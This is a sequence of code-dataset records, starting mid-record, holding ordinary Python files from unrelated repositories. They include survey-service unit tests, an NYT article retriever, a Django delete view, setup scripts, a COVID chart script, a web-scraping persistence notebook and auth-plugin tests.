ss.get_active_surveys(self.user_id)\n self.assertEqual(surveys, False)\n closed_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 6\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(closed_id, self.user_email)\n open_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 7\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(open_id, self.user_email)\n\n ss.close_survey(closed_id, self.user_id)\n\n surveys = ss.get_active_surveys(self.user_id)\n\n self.assertEqual(surveys[0][0], open_id)\n self.assertEqual(len(surveys), 1)\n\n def test_open_survey_normal(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 8\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n ss.close_survey(survey_id, self.user_id)\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, True)\n\n ss.open_survey(survey_id, self.user_id)\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, False)\n\n def test_open_survey_non_existant(self):\n ret = ss.open_survey(\"ITSNOTREAL\", self.user_id)\n self.assertEqual(ret, False)\n\n def test_open_survey_wrong_teacher(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 9\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n ss.close_survey(survey_id, self.user_id)\n ret = ss.open_survey(survey_id, self.user_id2)\n self.assertEqual(ret, False)\n\n ret = ss.check_if_survey_closed(survey_id)\n self.assertEqual(ret, True)\n\n def test_check_if_survey_results_saved(self):\n '''\n Test functions update_survey_answered() and check_if_survey_results_saved()\n '''\n\n # first check non existant case\n ret = ss.check_if_survey_results_saved(\"ITSNOTREAL\")\n self.assertEqual(ret, False)\n ret = ss.update_survey_answered(\"ITSNOTREAL\")\n self.assertEqual(ret, False)\n\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 10\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n answered = ss.check_if_survey_results_saved(survey_id)\n self.assertEqual(answered, False)\n\n ss.update_survey_answered(survey_id)\n\n answered = ss.check_if_survey_results_saved(survey_id)\n self.assertEqual(answered, True)\n\n def test_get_survey_as_dict(self):\n '''\n Tests that survey service parser dict correctly\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 11\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n survey_dict = ss.get_survey_as_dict(survey_id)\n\n # table surveys data\n self.assertEqual(survey_dict[\"id\"], survey_id)\n self.assertEqual(survey_dict[\"surveyname\"], \"Test survey 11\")\n self.assertEqual(survey_dict[\"min_choices\"], 2)\n self.assertEqual(survey_dict[\"closed\"], False)\n self.assertEqual(survey_dict[\"results_saved\"], False)\n 
self.assertEqual(survey_dict[\"survey_description\"], self.json_object[\"surveyInformation\"])\n self.assertEqual(survey_dict[\"time_begin\"], datetime.datetime(2023, 1, 1, 1, 1))\n self.assertEqual(survey_dict[\"time_end\"], datetime.datetime(2024, 1, 1, 2, 2))\n\n # table survey choices data\n self.assertEqual(survey_dict[\"choices\"][0][\"name\"], \"Esimerkkipäiväkoti 1\")\n self.assertEqual(survey_dict[\"choices\"][0][\"seats\"], 8)\n self.assertEqual(survey_dict[\"choices\"][0][\"Osoite\"], \"Keijukaistenpolku 14\")\n self.assertEqual(survey_dict[\"choices\"][0][\"Postinumero\"], \"00820\")\n\n self.assertEqual(survey_dict[\"choices\"][1][\"name\"], \"Esimerkkipäiväkoti 2\")\n self.assertEqual(survey_dict[\"choices\"][1][\"seats\"], 6)\n self.assertEqual(survey_dict[\"choices\"][1][\"Osoite\"], \"Hattulantie 2\")\n self.assertEqual(survey_dict[\"choices\"][1][\"Postinumero\"], \"00550\")\n\n def test_get_list_active_answered_invalid(self):\n active_list = ss.get_list_active_answered(\"ITSNOTREAL\")\n self.assertEqual(active_list, [])\n\n def test_get_list_closed_answered_invalid(self):\n closed_list = ss.get_list_closed_answered(\"ITSNOTREAL\")\n self.assertEqual(closed_list, [])\n\n def test_get_list_active_answered(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 12\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n ranking = \"2,3,5,4,1,6\"\n urr.add_user_ranking(self.user_id3, survey_id, ranking, \"\", \"\")\n active_list = ss.get_list_active_answered(self.user_id3)\n self.assertEqual(1, len(active_list))\n\n def test_get_list_closed_answered(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 12\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n ranking = \"2,3,5,4,1,6\"\n urr.add_user_ranking(self.user_id3, survey_id, ranking, \"\", \"\")\n ss.close_survey(survey_id, self.user_id)\n closed_list = ss.get_list_closed_answered(self.user_id3)\n self.assertEqual(1, len(closed_list))\n\n def test_check_surveys_to_close_empty(self):\n \"\"\"\n Test that the function works when no open surveys\n \"\"\"\n clear_database()\n self.setup_users()\n surveys = ss.check_for_surveys_to_close()\n self.assertEqual(False, surveys)\n\n def test_check_surveys_to_close(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 13\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n survey_id2 = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 14\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.1998\", \"01:01\", \"01.01.1999\", \"02:02\")\n sts.add_teacher_to_survey(survey_id2, self.user_email)\n surveys = ss.check_for_surveys_to_close()\n closed = ss.check_if_survey_closed(survey_id2)\n self.assertEqual(True, closed)\n\n def test_save_survey_edit(self):\n \"\"\"\n Test that editing a survey works\n \"\"\"\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 15\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n ss.save_survey_edit(survey_id, self.edit_dict, self.user_id)\n name = 
ss.get_survey_name(survey_id)\n self.assertEqual(name, \"Safest (most dangerous lmao) PED's\")\n desc = ss.get_survey_description(survey_id)\n self.assertEqual(desc, \"No way in hell will these have long term affects on your body, mind and soul.\")\n\n def test_survey_deleted(self):\n \"\"\"\"\n Test that after setting surveys as deleted it won't show up on list of active surveys\n \"\"\"\n with open(\"tests/test_files/test_survey1.json\", 'r') as openfile:\n # open as JSON instead of TextIOWrapper or something\n json_object = json.load(openfile)\n\n survey_id1 = ss.create_new_survey_manual(json_object[\"choices\"], \"Test survey 1\", self.user_id, json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n survey_id2 = ss.create_new_survey_manual(json_object[\"choices\"], \"Test survey 2\", self.user_id, json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n\n surveys = ss.get_all_active_surveys()\n self.assertEqual(2, len(surveys))\n\n ss.set_survey_deleted_true(survey_id1)\n surveys = ss.get_all_active_surveys()\n self.assertEqual(1, len(surveys))\n \n def test_len_active_surveys(self):\n \"\"\"\n Test that the length of all active surveys is correct\n \"\"\"\n surveys = ss.get_all_active_surveys()\n length = ss.len_all_surveys()\n self.assertEqual(0, length)\n self.assertFalse(surveys)\n\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 16\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n surveys = ss.get_all_active_surveys()\n length = ss.len_all_surveys()\n self.assertEqual(len(surveys), length)\n","repo_name":"piryopt/pienryhmien-optimointi","sub_path":"tests/survey_service_test.py","file_name":"survey_service_test.py","file_ext":"py","file_size_in_byte":17619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35033690026","text":"from django_project.settings import NYT_API_SECRET\nfrom django.utils import timezone, dateparse\nfrom urllib import request, parse\nfrom partisan.models import nyt_retriever_metadata, search_term, news\nfrom datetime import timedelta\nimport json\n\nclass nyt_retriever():\n\n nyt_endpoint = 'https://api.nytimes.com/svc/search/v2/articlesearch.json'\n next_page_meta = nyt_retriever_metadata()\n api_throttle_meta = nyt_retriever_metadata()\n\n def __init__(self):\n try:\n self.next_page_meta = nyt_retriever_metadata.objects.get(id=\"next_page_meta\")\n except nyt_retriever_metadata.DoesNotExist:\n new_pager_meta = nyt_retriever_metadata(id='next_page_meta', val='0')\n new_pager_meta.save()\n self.next_page_meta = new_pager_meta\n try:\n self.api_throttle_meta = nyt_retriever_metadata.objects.get(id='api_throttle_meta')\n except nyt_retriever_metadata.DoesNotExist:\n dt = timezone.now()\n dt = dt + timedelta(0, -6)\n new_throttle_meta = nyt_retriever_metadata(id='api_throttle_meta', val=dt.strftime('%Y-%m-%d %H:%M:%S%z'))\n new_throttle_meta.save()\n self.api_throttle_meta = new_throttle_meta\n\n def initiatePull(self, term: str, count: int):\n throttle = dateparse.parse_datetime(self.api_throttle_meta.val)\n if timezone.now() > throttle:\n new_dt = timezone.now()\n new_dt = new_dt + timedelta(0, 6)\n self.api_throttle_meta.val = new_dt.strftime('%Y-%m-%d %H:%M:%S%z')\n self.api_throttle_meta.save()\n return self.saveNews(term, count)\n\n def saveNews(self, term: str, count: int):\n pulled_count = 0\n yesterday = 
timezone.now() - timedelta(1)\n if count > 10:\n count = 10\n term = self.__createTerm(term=term)\n query = self.nyt_endpoint + '?q=' + parse.quote(term.term) \\\n + '&page=' + self.next_page_meta.val \\\n + '&api-key=' + NYT_API_SECRET \\\n + '&sort=newest&facet=true&facet_fields=source&begin_date=' + yesterday.strftime('%Y%m%d') \\\n + '&fl=lead_paragraph,headline,web_url'\n resp = request.urlopen(url=query)\n resp = json.loads(resp.read().decode('utf-8'))\n if resp['status'] == 'OK':\n for news_article in resp['response']['docs']:\n if len(news.objects.filter(source=news_article['web_url'])) == 0:\n new_article = news(\n source=news_article['web_url'],\n text=news_article['headline']['main'] + '. ' + news_article['lead_paragraph'],\n term_id=term.id,\n created_at=timezone.now().strftime('%Y-%m-%d %H:%M:%S%z')\n )\n new_article.save()\n pulled_count = pulled_count + 1\n self.__updatePager(resp)\n else:\n raise SystemError('A 200 was not returned by the NYT API. The response status is: ' + resp['status'])\n return pulled_count\n\n\n def __createTerm(self, term: str):\n term = search_term.getSearchTerm(term_name=term)\n if term:\n return term\n else:\n term = search_term(term_name=term)\n term.save()\n return term\n\n def __updatePager(self, resp: dict):\n if len(resp['response']['docs']) < 10:\n self.next_page_meta.val = '0'\n self.next_page_meta.save()\n else:\n self.next_page_meta.val = str(int(self.next_page_meta.val) + 1)\n self.next_page_meta.save()\n\n","repo_name":"aporretta4/the-partisan-project","sub_path":"partisan/p_classes/retrievers/nyt.py","file_name":"nyt.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"41264052762","text":"from django.shortcuts import redirect\nfrom django.http import Http404\nfrom login.models import Task, CheckBox\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.models import User\n\ndef deleteCheckBox(pTask):\n allUsers = pTask.course.user.all()\n \n for i in allUsers:\n checkbox = CheckBox.objects.get(user=i, task=pTask)\n checkbox.delete()\n del(allUsers)\n\n@login_required\n@permission_required(\"login.add_task\")\ndef deleteTask(request, id):\n task = Task.objects.get(id=id)\n course = task.course\n if course not in User.objects.get(username=request.user.username).courses.all():\n raise Http404(\"Beim Löschen dieser Aufgabe ist etwas schiefgelaufen\")\n# a = open(\"/home/erv/calendarHW/delete/delete.txt\", \"a\")\n# a.write(\" \".join((request.user.username, str(datetime.now()), str(task.finishDate), task.taskType, task.taskDescription, str(task.course), \"\\n\")))\n# a.close()\n deleteCheckBox(task)\n task.delete()\n del(task)\n return redirect(\"/homework\")\n","repo_name":"asdasdqwer/calendarHW","sub_path":"delete/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"24259182863","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nreadme = open(os.path.join(here, 'README.md')).read()\nchanges = open(os.path.join(here, 'CHANGES.md')).read()\n\nrequires = [\n 'pyramid',\n 'psycopg2',\n 'SQLAlchemy',\n 'transaction',\n 'pyramid_tm',\n 'pyramid_debugtoolbar',\n 'pyramid_beaker',\n 'pyramid_scss',\n 'pyramid_jinja2',\n 'zope.sqlalchemy',\n 'waitress',\n 'python-dateutil',\n 
'sqlalchemy-batteries>=0.4.4',\n 'docopt',\n]\n\nsetup(\n name='scramble',\n version='0.0',\n description='scramble',\n long_description=\"{readme}\\n\\n{changes}\".format(readme=readme, changes=changes),\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Pyramid\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Internet :: WWW/HTTP :: WSGI :: Application\",\n ],\n author='',\n author_email='',\n url='',\n keywords='web wsgi bfg pylons pyramid',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n test_suite='scramble',\n install_requires = requires,\n entry_points = {\n 'paste.app_factory': [\n 'main = scramble:main',\n ],\n 'console_scripts': [\n 'populate_scramble = scramble.scripts.populate:main',\n ]\n },\n)\n","repo_name":"jessedhillon/scramble","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"34924968303","text":"import sys\n\npk_card = int(sys.stdin.readline())\npk_door = int(sys.stdin.readline())\n\nval = 1\ndef trans(num):\n global val\n val = val * num % 20201227\n return val\n\nfor i in range(12):\n bla = trans(17807724)\n print(i, bla)\n\nval = 1\ni = 1\nwhile True:\n if trans(7) == pk_card:\n ls_card = i\n break\n i += 1\nprint('loop size card', ls_card)\n\nval = 1\nfor i in range(ls_card):\n bla = trans(pk_door)\nprint(bla)\n","repo_name":"xilefsensei/adventofcode","sub_path":"20/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"8055168927","text":"fib1 = [1, 1, 2, 3, 5, 8, 13]\n\n# get element\nfib1[1] # 1\n\n# slice\nfib1[0:4] # [1,1,2,3]\n\n# concatenation\nfib2 = [21, 34, 55]\nfib1 + fib2 # [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n\n# change element\nfib1[0] = 9\n\n# append\nfib1.append(21)\n\n# pop\nfib1.pop()\n\n# remove\nfib1.remove(8) # removes only the first matching element\n\n# delete, remove with index\ndel(fib1[0])\n\n# mix data types\nchars = ['mario', 'luigi', 'bowser']\nchars.append(5)\n\n# list in list\nnums = [chars, fib1, [1, 2, 3, 4]]\n","repo_name":"MudOnTire/python3-learning","sub_path":"3. lists.py","file_name":"3. 
lists.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13001957815","text":"from setuptools import setup\ndescription = \"A Lattice QCD library including statistical, fitting, \" \\\n \"plotting functions and a runner module to help organise \" \\\n \"projects.\"\nsetup(\n name='pyon',\n version='0.0.5',\n packages=['pyon', 'pyon.lib', 'pyon.test', 'pyon.runner',\n 'pyon.lib.io'\n ],\n url='',\n license='',\n author='Shane Drury',\n author_email='shane.r.drury@gmail.com',\n description=description,\n install_requires=['numpy', 'scipy', 'simplejson', 'Jinja2', 'django',\n 'dill', 'matplotlib'],\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'Development Status :: 2 - Pre-Alpha',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Scientific/Engineering :: Physics',\n 'Topic :: Scientific/Engineering :: Mathematics',\n ],\n entry_points={\n 'console_scripts': ['pyon-admin = '\n 'pyon.core.management:execute_from_command_line'],\n }\n)\n","repo_name":"ShaneDrury/pyon","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29300296656","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\nDAY = 86400\nINTERVAL = 2\n\nfig, ax = plt.subplots()\nfig.autofmt_xdate()\nfig.canvas.manager.set_window_title('Shanghai Infected Persons Line Chart')\n\ndf = pd.read_csv('./data.csv') # data frame\n\ndate = np.array(list(map(lambda x: x.replace(\"月\", \".\").replace(\"日\", \"\"), df.loc[:, \"日期\"].values[::-1])))\ninflection_Persons = df.loc[:, \"感染者\"].values[::-1]\nasymptomatic_Persons = df.loc[:, \"无症状感染者\"].values[::-1]\ndate_index = np.arange(0, len(date))\n\ndef get_perdict_date(start_date=1647187200, length=14):\n return [time.strftime(\"%-m月%-d日\", time.localtime(start_date + DAY * i)) for i in range(length)]\n\nplt.figure(figsize=(len(inflection_Persons) * 0.6, 6), dpi=400)\n\nplt.title(\"Shanghai Infected Persons Line Chart\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Infected Persons\")\nplt.scatter(date, inflection_Persons)\nplt.scatter(date, asymptomatic_Persons)\nplt.plot(date, inflection_Persons, label=\"Infected Persons\")\nplt.plot(date, asymptomatic_Persons, label=\"Asymptomatic Infected Persons\")\n\n# polyfit to get the linear regression. 
y = ax + b\n# But this data fits better with an exponential regression:\n# fit y = A * e^(a*x); writing A = e^b gives y = e^(a*x + b), i.e. ln(y) = a*x + b\n# so polyfit on ln(y) returns [a, b], and the fitted curve is y = e^b * e^(a*x)\n[a, b] = np.polyfit(date_index, np.log(asymptomatic_Persons), 1) \nplt.plot(date, np.exp(a * date_index + b), label=f\"y = {np.exp(b):.1f} * e ^ ({a:.1f} * x)\")\n\nplt.legend()\nplt.savefig('preview.png')","repo_name":"SteveYuOWO/covid-19-shanghai-inflection-chart","sub_path":"exportpng.py","file_name":"exportpng.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
{"seq_id":"17499683613","text":"import data\nimport config\nfrom util import iterate, BreakIteration\nfrom base import nbprint\n\nfrom vocab.common import get_vocab_builder\nfrom vocab.vocab_util import check_requirements\n\ndef check_tokens(info):\n # Check if Tokens exist\n if not check_requirements(info):\n nbprint('Skipping Vocab (requirements not satisfied)')\n raise BreakIteration()\n \ndef build_vocab(info):\n # Check if vocab exists\n if config.skip_existing and data.vocab_exists(info):\n nbprint('Skipping Vocab (file exists)')\n return\n \n # Build vocab\n current_vocab_builder = get_vocab_builder(info)\n current_vocab_builder.build_vocab()\n vocab = current_vocab_builder.get_vocab()\n \n # Save Vocab\n data.save_vocab(vocab, info)\n\ndef run_vocab(info = None):\n nbprint('Vocab').push()\n \n if info is None:\n iterate([\"data\", \"token\", \"vocab\"], [check_tokens, build_vocab])\n else:\n check_tokens(info)\n build_vocab(info)\n \n nbprint.pop()","repo_name":"unlikelymaths/tomef","sub_path":"tomef/vocab/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"43518934507","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Persistence and Efficiency\n# You now might be aware of some of the problems with parsing several pages and how that can quickly get out of hand. While parsing, you might choose to persist the collected data, so that it can be analyzed and cleaned later. \n# Parsing, retrieving, saving, and cleaning data are all separate actions, and you shouldn't try to work with data while collecting it. In this notebook you'll practice further parsing techniques along with persistence, both for JSON and CSV formats as well as using SQL and a database.\n# \n# Start by loading one of the available HTML files into the `scrapy` library\n\n# In[1]:\n\n\n# If you haven't already created and activated a virtual environment for this notebook, run this cell\nget_ipython().system('python3 -m venv venv')\nget_ipython().system('source venv/bin/activate')\nget_ipython().system('pip install -r requirements.txt')\n\n\n# In[4]:\n\n\nimport scrapy\nimport os\ncurrent_dir = os.path.abspath('')\nurl = os.path.join(current_dir, \"html/1992_World_Junior_Championships_in_Athletics_–_Men's_high_jump\")\nwith open(url) as _f:\n url_data = _f.read()\n\nresponse = scrapy.http.TextResponse(url, body=url_data, encoding='utf-8')\n\n\n# In[5]:\n\n\n# Make sure that the interesting data is available \ntable = response.xpath('//table')[1].xpath('tbody')\nfor tr in table.xpath('tr'):\n print(tr.xpath('td/b/text()').extract()[0],\n tr.xpath('td/a/text()').extract()[0]\n )\n\n\n# This interaction with `scrapy` in a Jupyter Notebook is useful because you don't need to run the special shell and you also don't need to run the whole spider. Once you learn what you need to do here, you can adapt the spider to persist data.\n# First, start by persisting data as JSON. To do this, you will need to keep the information in a Python data structure like a dictionary, and then load it as a JSON object, and finally, save it to a file.\n\n# In[6]:\n\n\nscrapped_data = {}\nfor tr in table.xpath('tr'):\n medal = tr.xpath('td/b/text()').extract()[0]\n athlete = tr.xpath('td/a/text()').extract()[0]\n scrapped_data[medal] = athlete\n\nscrapped_data\n\n\n# In[7]:\n\n\nimport json\n\n# You can convert Python into JSON first, but there is no need if you use `json.dump()`\n# as shown next\njson_data = json.dumps(scrapped_data)\n\n# Persist it in a file:\nwith open(\"1992_results.json\", \"w\") as _f:\n # use dump() with the Python dictionary directly. \n # the conversion is done on the fly\n json.dump(scrapped_data, _f)\n\n\n# Now that you can persist the scraped data as JSON, you can also use CSV. This is especially useful if you want to do some data science operations. Although you can use an advanced library like Pandas for this, you can use the standard library CSV module from Python.\n\n# In[8]:\n\n\n# construct the data first\n\ncolumn_names = [\"Medal\", \"Athlete\"]\nrows = []\n\nfor tr in table.xpath('tr'):\n medal = tr.xpath('td/b/text()').extract()[0]\n athlete = tr.xpath('td/a/text()').extract()[0]\n rows.append([medal, athlete])\n\n\n# In[9]:\n\n\n# Now persist it to disk\nimport csv\n\nwith open(\"1992_results.csv\", \"w\") as _f:\n writer = csv.writer(_f)\n\n # write the column names\n writer.writerow(column_names)\n\n # now write the rows\n writer.writerows(rows)\n\n\n# Finally, you can persist data to a database. Unlike the JSON and CSV approach, using a database is much more memory efficient. This is the principal reason why you want to use a database instead of a file on disk. Imagine capturing 10GB of data. This could potentially mean that you need 10GB of available memory to hold onto that data before saving it to disk.\n# By using a database, you can save the data as the data is gathered. \n# \n# For the next cells, use a SQLite database to persist the data. Create the file-based database and the table needed.\n\n# In[10]:\n\n\nimport sqlite3\nconnection = sqlite3.connect(\"1992_results.db\")\ndb_table = 'CREATE TABLE results (id integer primary key, medal TEXT, athlete TEXT)'\ncursor = connection.cursor()\ncursor.execute(db_table)\nconnection.commit()\n\n\n# In[11]:\n\n\n# Now it is time to persist the data. Open the connection again\nconnection = sqlite3.connect(\"1992_results.db\")\ncursor = connection.cursor()\nquery = 'INSERT INTO results(medal, athlete) VALUES(?, ?)'\n\nfor tr in table.xpath('tr'):\n medal = tr.xpath('td/b/text()').extract()[0]\n athlete = tr.xpath('td/a/text()').extract()[0]\n cursor.execute(query, (medal, athlete)) \n connection.commit()\n\n\n# The data is now persisted in a file-based database that you can query. Verify that it all works by creating a new connection and querying the database.\n# \n# Update the _wikipedia_ project and spider to use some of these techniques to persist data. Next, try parsing all the files in the _html_ directory instead of just one and persist all results. Do you think you can parse other information as well? 
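Below is a minimal, untested sketch of one way to pull every cell of a row (the td//text() path and the column positions are hypothetical and should be verified against the actual HTML):\n# \n# for tr in table.xpath('tr'):\n#     cells = [c.strip() for c in tr.xpath('td//text()').extract() if c.strip()]\n#     # cells might then look like ['Gold', 'Steve Smith', '2.37'], with the height in the last column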
\n# \n# Try parsing the height and the results from all the other athletes, not just the top three places.\n","repo_name":"numinousmuses/duke-scripting-sql","sub_path":"persistence lab.py","file_name":"persistence lab.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15425074906","text":"import argparse\n\nimport fixtures\nimport mock\nimport requests\nfrom stevedore import extension\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom essential.apiclient import auth\nfrom essential.apiclient import client\nfrom essential.apiclient import fake_client\nfrom essential import test\n\n\nTEST_REQUEST_BASE = {\n 'verify': True,\n}\n\n\ndef mock_http_request(resp=None):\n \"\"\"Mock an HTTP Request.\"\"\"\n if not resp:\n resp = {\n \"access\": {\n \"token\": {\n \"expires\": \"12345\",\n \"id\": \"FAKE_ID\",\n \"tenant\": {\n \"id\": \"FAKE_TENANT_ID\",\n }\n },\n \"serviceCatalog\": [\n {\n \"type\": \"compute\",\n \"endpoints\": [\n {\n \"region\": \"RegionOne\",\n \"adminURL\": \"http://localhost:8774/v1.1\",\n \"internalURL\": \"http://localhost:8774/v1.1\",\n \"publicURL\": \"http://localhost:8774/v1.1/\",\n },\n ],\n },\n ],\n },\n }\n\n auth_response = fake_client.TestResponse({\n \"status_code\": 200,\n \"text\": json.dumps(resp),\n })\n return mock.Mock(return_value=(auth_response))\n\n\ndef requested_headers(cs):\n \"\"\"Return requested passed headers.\"\"\"\n return {\n 'User-Agent': cs.user_agent,\n 'Content-Type': 'application/json',\n }\n\n\nclass BaseFakePlugin(auth.BaseAuthPlugin):\n def _do_authenticate(self, http_client):\n pass\n\n def token_and_endpoint(self, endpoint_type, service_type):\n pass\n\n\nclass GlobalFunctionsTest(test.BaseTestCase):\n\n def test_load_auth_system_opts(self):\n self.useFixture(fixtures.MonkeyPatch(\n \"os.environ\",\n {\"OS_TENANT_NAME\": \"fake-project\",\n \"OS_USERNAME\": \"fake-username\"}))\n parser = argparse.ArgumentParser()\n auth.load_auth_system_opts(parser)\n options = parser.parse_args(\n [\"--os-auth-url=fake-url\", \"--os_auth_system=fake-system\"])\n self.assertEqual(options.os_tenant_name, \"fake-project\")\n self.assertEqual(options.os_username, \"fake-username\")\n self.assertEqual(options.os_auth_url, \"fake-url\")\n self.assertEqual(options.os_auth_system, \"fake-system\")\n\n\nclass MockEntrypoint(object):\n def __init__(self, name, plugin):\n self.name = name\n self.plugin = plugin\n\n\nclass AuthPluginTest(test.BaseTestCase):\n @mock.patch.object(requests.Session, \"request\")\n @mock.patch.object(extension.ExtensionManager, \"map\")\n def test_auth_system_success(self, mock_mgr_map, mock_request):\n \"\"\"Test that we can authenticate using the auth system.\"\"\"\n class FakePlugin(BaseFakePlugin):\n def authenticate(self, cls):\n cls.request(\n \"POST\", \"http://auth/tokens\",\n json={\"fake\": \"me\"}, allow_redirects=True)\n\n mock_mgr_map.side_effect = (\n lambda func: func(MockEntrypoint(\"fake\", FakePlugin)))\n\n mock_request.side_effect = mock_http_request()\n\n auth.discover_auth_systems()\n plugin = auth.load_plugin(\"fake\")\n cs = client.HTTPClient(auth_plugin=plugin)\n cs.authenticate()\n\n headers = requested_headers(cs)\n\n mock_request.assert_called_with(\n \"POST\",\n \"http://auth/tokens\",\n headers=headers,\n data='{\"fake\": \"me\"}',\n allow_redirects=True,\n **TEST_REQUEST_BASE)\n\n @mock.patch.object(extension.ExtensionManager, \"map\")\n def 
test_discover_auth_system_options(self, mock_mgr_map):\n \"\"\"Test that we can load the auth system options.\"\"\"\n class FakePlugin(BaseFakePlugin):\n @classmethod\n def add_opts(cls, parser):\n parser.add_argument('--auth_system_opt',\n default=False,\n action='store_true',\n help=\"Fake option\")\n\n mock_mgr_map.side_effect = (\n lambda func: func(MockEntrypoint(\"fake\", FakePlugin)))\n\n parser = argparse.ArgumentParser()\n auth.discover_auth_systems()\n auth.load_auth_system_opts(parser)\n opts, _args = parser.parse_known_args(['--auth_system_opt'])\n\n self.assertTrue(opts.auth_system_opt)\n\n @mock.patch.object(extension.ExtensionManager, \"map\")\n def test_parse_auth_system_options(self, mock_mgr_map):\n \"\"\"Test that we can parse the auth system options.\"\"\"\n class FakePlugin(BaseFakePlugin):\n opt_names = [\"fake_argument\"]\n\n mock_mgr_map.side_effect = (\n lambda func: func(MockEntrypoint(\"fake\", FakePlugin)))\n\n auth.discover_auth_systems()\n plugin = auth.load_plugin(\"fake\")\n\n plugin.parse_opts([])\n self.assertIn(\"fake_argument\", plugin.opts)\n","repo_name":"gaolichuang/py-essential","sub_path":"tests/apiclient/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
